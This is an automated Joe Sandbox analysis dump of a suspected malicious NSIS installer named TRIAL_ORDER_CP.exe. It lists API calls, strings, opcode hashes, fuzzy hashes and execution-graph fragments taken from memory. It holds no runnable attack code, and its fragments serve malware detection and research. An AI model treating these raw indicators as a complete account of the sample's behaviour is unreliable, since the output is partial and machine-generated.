                                          • String ID: "C:\Users\user\Desktop\TRIAL_ORDER_CP.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 589700163-333691771
                                          • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                          • Instruction ID: 8a5b279eb1c6e0cea376d4f623a12da6f674b8daf8575b9a92ef11e753d0d18b
                                          • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                          • Instruction Fuzzy Hash: D111B66780121299DB303B158C44AB766E8EF54794F52C03FED8A732C0E77C4C9286AD
                                          APIs
                                          • GetWindowLongW.USER32(?,000000EB), ref: 00404557
                                          • GetSysColor.USER32(00000000), ref: 00404595
                                          • SetTextColor.GDI32(?,00000000), ref: 004045A1
                                          • SetBkMode.GDI32(?,?), ref: 004045AD
                                          • GetSysColor.USER32(?), ref: 004045C0
                                          • SetBkColor.GDI32(?,?), ref: 004045D0
                                          • DeleteObject.GDI32(?), ref: 004045EA
                                          • CreateBrushIndirect.GDI32(?), ref: 004045F4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                          • String ID:
                                          • API String ID: 2320649405-0
                                          • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                          • Instruction ID: 9e725ab64d6b149d2d2f876944178e70108deb967c5ff43b0f72f150d1bef9aa
                                          • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                          • Instruction Fuzzy Hash: DA2177B1500704AFCB309F78DD18B5BBBF4BF41710B04892EEA96A22E0D739E944CB54
                                          APIs
                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FD6
                                          • MulDiv.KERNEL32(000F78CC,00000064,000F7AD0), ref: 00403001
                                          • wsprintfW.USER32 ref: 00403011
                                          • SetWindowTextW.USER32(?,?), ref: 00403021
                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403033
                                          Strings
                                          • verifying installer: %d%%, xrefs: 0040300B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: Text$ItemTimerWindowwsprintf
                                          • String ID: verifying installer: %d%%
                                          • API String ID: 1451636040-82062127
                                          • Opcode ID: c24f39b73ea1f3b51e5f33cc7d94247a9242632f843dd5f1d8eee7270cd10b93
                                          • Instruction ID: 52c7d57b2d50c4e26d0c42f1be749ca1a93388b8845742b28701603c77c86054
                                          • Opcode Fuzzy Hash: c24f39b73ea1f3b51e5f33cc7d94247a9242632f843dd5f1d8eee7270cd10b93
                                          • Instruction Fuzzy Hash: 89016270640209BBEF209F60DD4AFEE3B79EB04344F10803AFA02B51D0DBB99A559F58
                                          APIs
                                            • Part of subcall function 706812BB: GlobalAlloc.KERNELBASE(00000040,?,706812DB,?,7068137F,00000019,706811CA,-000000A0), ref: 706812C5
                                          • GlobalFree.KERNEL32(?), ref: 70682743
                                          • GlobalFree.KERNEL32(00000000), ref: 70682778
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270781877421.0000000070681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 70680000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_70680000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: Global$Free$Alloc
                                          • String ID:
                                          • API String ID: 1780285237-0
                                          • Opcode ID: 3824f2a51a085bb2a32bfcef197be0977a1ccdca2adae9083c265e4d0f4c53ba
                                          • Instruction ID: 84e7fab3eba6a4636dc249189944b94dc87c568fbff39f58efcbd8320e17767e
                                          • Opcode Fuzzy Hash: 3824f2a51a085bb2a32bfcef197be0977a1ccdca2adae9083c265e4d0f4c53ba
                                          • Instruction Fuzzy Hash: 4731C2B2504202EFC7268F56CDF8D6E7BBBFB89344324452DF202972E4D77168459B62
                                          APIs
                                          • GlobalFree.KERNEL32(00000000), ref: 706825C2
                                            • Part of subcall function 706812CC: lstrcpynW.KERNEL32(00000000,?,7068137F,00000019,706811CA,-000000A0), ref: 706812DC
                                          • GlobalAlloc.KERNEL32(00000040), ref: 70682548
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 70682563
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270781877421.0000000070681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 70680000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_70680000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                          • String ID:
                                          • API String ID: 4216380887-0
                                          • Opcode ID: 4376a406a418de7cd35d68a1dab9a3fb3ab3bd67f3b2ab4d47d8365961dc07c4
                                          • Instruction ID: d62e932ebf749eaf388fa02f360d8198850aedd80384790446ac97762c8f07c2
                                          • Opcode Fuzzy Hash: 4376a406a418de7cd35d68a1dab9a3fb3ab3bd67f3b2ab4d47d8365961dc07c4
                                          • Instruction Fuzzy Hash: 624199B1008306EFD7159F25D874A6E77FAFB84310B20491DF5468A6D1EB70A984DB72
                                          APIs
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,706822D8,?,00000808), ref: 706816D5
                                          • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,706822D8,?,00000808), ref: 706816DC
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,706822D8,?,00000808), ref: 706816F0
                                          • GetProcAddress.KERNEL32(706822D8,00000000), ref: 706816F7
                                          • GlobalFree.KERNEL32(00000000), ref: 70681700
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270781877421.0000000070681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 70680000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_70680000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                          • String ID:
                                          • API String ID: 1148316912-0
                                          • Opcode ID: 882846cfce05aa05cf2db063ac561cde50c249f02b5465a84e8420ad08971d18
                                          • Instruction ID: 2ba5d004923a6175b1c188c2f62b4b7be78d81e08e7e243648011d8b44124b00
                                          • Opcode Fuzzy Hash: 882846cfce05aa05cf2db063ac561cde50c249f02b5465a84e8420ad08971d18
                                          • Instruction Fuzzy Hash: 9FF098732061387F96211BA79C4CDABBE9CEF8B2F9B210215F728921E096A15D0197F1
                                          APIs
                                            • Part of subcall function 00406554: lstrcpynW.KERNEL32(?,?,00000400,004036A1,007A7260,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406561
                                            • Part of subcall function 00405ECE: CharNextW.USER32(?,?,007A3F50,?,00405F42,007A3F50,007A3F50,?,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,75D23420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TRIAL_ORDER_CP.exe"), ref: 00405EDC
                                            • Part of subcall function 00405ECE: CharNextW.USER32(00000000), ref: 00405EE1
                                            • Part of subcall function 00405ECE: CharNextW.USER32(00000000), ref: 00405EF9
                                          • lstrlenW.KERNEL32(007A3F50,00000000,007A3F50,007A3F50,?,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,75D23420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TRIAL_ORDER_CP.exe"), ref: 00405F84
                                          • GetFileAttributesW.KERNEL32(007A3F50,007A3F50,007A3F50,007A3F50,007A3F50,007A3F50,00000000,007A3F50,007A3F50,?,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,75D23420,C:\Users\user\AppData\Local\Temp\), ref: 00405F94
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                          • String ID: C:\Users\user\AppData\Local\Temp\$P?z
                                          • API String ID: 3248276644-3222627218
                                          • Opcode ID: bcbf200ecc0ebcd9a110e0aedcb8263399075ff3aca88ce7f3d60eb64f48f27a
                                          • Instruction ID: f4f6e0775867387827aab8404002f3e8856b431f62ec50d584846b16db6dccac
                                          • Opcode Fuzzy Hash: bcbf200ecc0ebcd9a110e0aedcb8263399075ff3aca88ce7f3d60eb64f48f27a
                                          • Instruction Fuzzy Hash: 9BF02D36105E5319D62273365C09AAF1544CF86358709057BF852B12D5CF3C8A53CC7E
                                          APIs
                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00405E29
                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00405E33
                                          • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C), ref: 00405E45
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E23
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: CharPrevlstrcatlstrlen
                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 2659869361-3355392842
                                          • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                          • Instruction ID: d63f260b1a4b66e3edf6d37d75e222a08c60d96d58f132ba82df153afabc7d48
                                          • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                          • Instruction Fuzzy Hash: EDD0A771101534BAC212AB54AC04CDF73ACAF46344342403BF541B30A5C77C5D5187FD
                                          APIs
                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 70681171
                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 706811E3
                                          • GlobalFree.KERNEL32 ref: 7068124A
                                          • GlobalFree.KERNEL32(?), ref: 7068129B
                                          • GlobalFree.KERNEL32(00000000), ref: 706812B1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270781877421.0000000070681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 70680000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_70680000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: Global$Free$Alloc
                                          • String ID:
                                          • API String ID: 1780285237-0
                                          • Opcode ID: 653348eec17a0e8e0b669c42a3d5aa6b8ddbec1e46215d6b6350edb44b95529d
                                          • Instruction ID: f1032bbe9e7cc79088bc4c53bc2b86ece50da694769497c96fc07138ae393018
                                          • Opcode Fuzzy Hash: 653348eec17a0e8e0b669c42a3d5aa6b8ddbec1e46215d6b6350edb44b95529d
                                          • Instruction Fuzzy Hash: B7515BB6500206AFD701CF69C879A5A77BCFB04315B204519FA46EF3E4E775AA80CB54
                                          APIs
                                          • DestroyWindow.USER32(00000000,00000000,0040321C,00000001), ref: 00403051
                                          • GetTickCount.KERNEL32 ref: 0040306F
                                          • CreateDialogParamW.USER32(0000006F,00000000,00402FB8,00000000), ref: 0040308C
                                          • ShowWindow.USER32(00000000,00000005), ref: 0040309A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                          • String ID:
                                          • API String ID: 2102729457-0
                                          • Opcode ID: 69c8c07bcb791fb785738829cd10c29190a6685c9026359a959baa5e0d41d55b
                                          • Instruction ID: 04dff40eaa5975d4421a2039d3eb5be5080597dcfa90b8d0ab21d67e5ec7c10f
                                          • Opcode Fuzzy Hash: 69c8c07bcb791fb785738829cd10c29190a6685c9026359a959baa5e0d41d55b
                                          • Instruction Fuzzy Hash: BFF05430406621AFC6616F50FD08A9B7B69FB45B12B45843BF145F11E8C73C48818B9D
                                          APIs
                                          • FreeLibrary.KERNEL32(?,75D23420,00000000,C:\Users\user\AppData\Local\Temp\,00403B69,00403A7F,0000000A,?,00000008,0000000A,0000000C), ref: 00403BAB
                                          • GlobalFree.KERNEL32(008DD7C0), ref: 00403BB2
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: Free$GlobalLibrary
                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 1100898210-3355392842
                                          • Opcode ID: 00efa9c9f1272b7cc7d931f24958e2d47b6ee42ce3838b547fcba19599468942
                                          • Instruction ID: b7081a2a86391088548fef66407111aafa244a1a89fd4905b066b82f00895e7d
                                          • Opcode Fuzzy Hash: 00efa9c9f1272b7cc7d931f24958e2d47b6ee42ce3838b547fcba19599468942
                                          • Instruction Fuzzy Hash: 59E0C23340053057CB211F45ED04B1AB778AF95B26F09807BE940BB2618BBC2C438FC8
                                          APIs
                                          • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\TRIAL_ORDER_CP.exe,C:\Users\user\Desktop\TRIAL_ORDER_CP.exe,80000000,00000003), ref: 00405E75
                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\TRIAL_ORDER_CP.exe,C:\Users\user\Desktop\TRIAL_ORDER_CP.exe,80000000,00000003), ref: 00405E85
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: CharPrevlstrlen
                                          • String ID: C:\Users\user\Desktop
                                          • API String ID: 2709904686-3370423016
                                          • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                          • Instruction ID: e625fb8110be14d05545ed3956eb9dcd351d24123ebbdb87cfc6543e98ba95a5
                                          • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                          • Instruction Fuzzy Hash: 27D05EB3400920AAC312A704DD00DAF73A8EF523447464466F881A71A5D7785D8186EC
                                          APIs
                                          • lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000), ref: 00405FB9
                                          • lstrcmpiA.KERNEL32(?,?), ref: 00405FD1
                                          • CharNextA.USER32(?,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000), ref: 00405FE2
                                          • lstrlenA.KERNEL32(?,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000), ref: 00405FEB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: lstrlen$CharNextlstrcmpi
                                          • String ID:
                                          • API String ID: 190613189-0
                                          • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                          • Instruction ID: 0ddac3552a90187c63c7b8d1f8650bd486a880c4da7af56fddea67c471c8745b
                                          • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                          • Instruction Fuzzy Hash: 5AF09631104515FFCB029FA5DE04D9FBBA8EF05350B2540B9F880F7250D678DE01ABA9

                                          Execution Graph

                                          Execution Coverage: 0%
                                          Dynamic/Decrypted Code Coverage: 100%
                                          Signature Coverage: 100%
                                          Total number of Nodes: 1
                                          Total number of Limit Nodes: 0
                                          execution_graph 67897 33b52a80 LdrInitializeThunk

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 5 33b534e0-33b534ec LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: b542c24bfbe670421b38dad8eacde2a2cf3d290aa3a96501b4857b46be9fac5f
                                          • Instruction ID: 97cf9a76f8e2b7a984c992fcaf23eb323702d1dd4853ba3d5e9e00a01f05e393
                                          • Opcode Fuzzy Hash: b542c24bfbe670421b38dad8eacde2a2cf3d290aa3a96501b4857b46be9fac5f
                                          • Instruction Fuzzy Hash: A090023160510802D54061584624706100547D020AF61D826A0418528ED7A5895575A3

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1 33b52b90-33b52b9c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 180459459235e4639007360406a28b9cb2ff4e8918380dece9f2fe5d9915ed74
                                          • Instruction ID: 8bec81f3d27aba20f47acaa0910d300495dc00cc2e391c090089b27b70856b5d
                                          • Opcode Fuzzy Hash: 180459459235e4639007360406a28b9cb2ff4e8918380dece9f2fe5d9915ed74
                                          • Instruction Fuzzy Hash: 8690023120108C02D5506158851474A000547D030AF55D826A4418618ED6A588957122

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2 33b52bc0-33b52bcc LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 6f4cbbea7da9a934d1171cba200e4340fde7dc88f88509be6396b869ed22534c
                                          • Instruction ID: 9cb7b60a7863181ad4d786cc8cdfaa941db3e9722f81148e978d73e1738fd54f
                                          • Opcode Fuzzy Hash: 6f4cbbea7da9a934d1171cba200e4340fde7dc88f88509be6396b869ed22534c
                                          • Instruction Fuzzy Hash: 3290023120100802D54065985518646000547E030AF51E426A5018515FD67588957132

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 33b52a80-33b52a8c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: df467a3753909e3c64a732954e667425ef305fc22c66219ec87a1fd1c9f928da
                                          • Instruction ID: bde3881b6f12d86b198127648734ccb70a5355c32cabd6ff8a589e495c2357ce
                                          • Opcode Fuzzy Hash: df467a3753909e3c64a732954e667425ef305fc22c66219ec87a1fd1c9f928da
                                          • Instruction Fuzzy Hash: D090026120200403454571584524616400A47E020AB51D436E1008550ED53588957126

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 4 33b52eb0-33b52ebc LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: ca59f929ec56302028d1ba77669a8269f5f75fa48fa12788b1b4a070ecdbe66c
                                          • Instruction ID: 28de24dcfbd488db417fb1d66483fb9ff20ac2f6daa5a75c7373b8af65323bba
                                          • Opcode Fuzzy Hash: ca59f929ec56302028d1ba77669a8269f5f75fa48fa12788b1b4a070ecdbe66c
                                          • Instruction Fuzzy Hash: DD90023120140802D5406158492470B000547D030BF51D426A1158515ED63588557572

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 3 33b52d10-33b52d1c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: c135d469602d82d3ae835530b21d20ddb02b75f59eb58e09ea89bce7164d700d
                                          • Instruction ID: 71586b8e709a3f258762744d48334707056aba7bf698963dcf738ea866804d7b
                                          • Opcode Fuzzy Hash: c135d469602d82d3ae835530b21d20ddb02b75f59eb58e09ea89bce7164d700d
                                          • Instruction Fuzzy Hash: DD90023120100813D55161584614707000947D024AF91D827A0418518EE6668956B122

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: $ $0
                                          • API String ID: 3446177414-3352262554
                                          • Opcode ID: 595d8b72560caf37d834888372a2d3905c26a13a3e8afae58acaa33ceb46c9e0
                                          • Instruction ID: 7cdefce1001d730647bcfda6ea5625692a6889fd57feca2a15773811e41a7b15
                                          • Opcode Fuzzy Hash: 595d8b72560caf37d834888372a2d3905c26a13a3e8afae58acaa33ceb46c9e0
                                          • Instruction Fuzzy Hash: 363201B1A083818FE750CF68C884B6BBBF5BB88344F04492EF599C7250DB75E949CB52

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                          • API String ID: 3446177414-1700792311
                                          • Opcode ID: 29d85cfc95e105bb007be5cfb8ef8865fde33a5ba4480efd049fef6667d1c343
                                          • Instruction ID: aaae615242c01edefcd481d36cd53f59487b101b07951512e9a57f290183b003
                                          • Opcode Fuzzy Hash: 29d85cfc95e105bb007be5cfb8ef8865fde33a5ba4480efd049fef6667d1c343
                                          • Instruction Fuzzy Hash: C2D1EF399017C5DFDB12DFA8C440AAABBF5FF49304F498469E484AB662CB39D981CF10
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                          • API String ID: 3446177414-1745908468
                                          • Opcode ID: 9f07e1cfe3761ed6b054646ff81fde009d2033a9691d5136714137efec53cab7
                                          • Instruction ID: c3b9dfbff08dfe9bf8e7ad2db73a19986e03ff1b0511323918bb1927f394168f
                                          • Opcode Fuzzy Hash: 9f07e1cfe3761ed6b054646ff81fde009d2033a9691d5136714137efec53cab7
                                          • Instruction Fuzzy Hash: A391DF79A007859FDF01CFA8C440AADBBF2FF49354F488669E485AB652CB75DA41CF20
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                          • API String ID: 0-3532704233
                                          • Opcode ID: 218c2e078614a99eaaf7e38129d7ea6b3984a0910dcbeb82fcdb42d62b1221ce
                                          • Instruction ID: 90d50f546283c7272252dcfd157abb8e9d2ce0e620da1ef11dedb68db7a0bebb
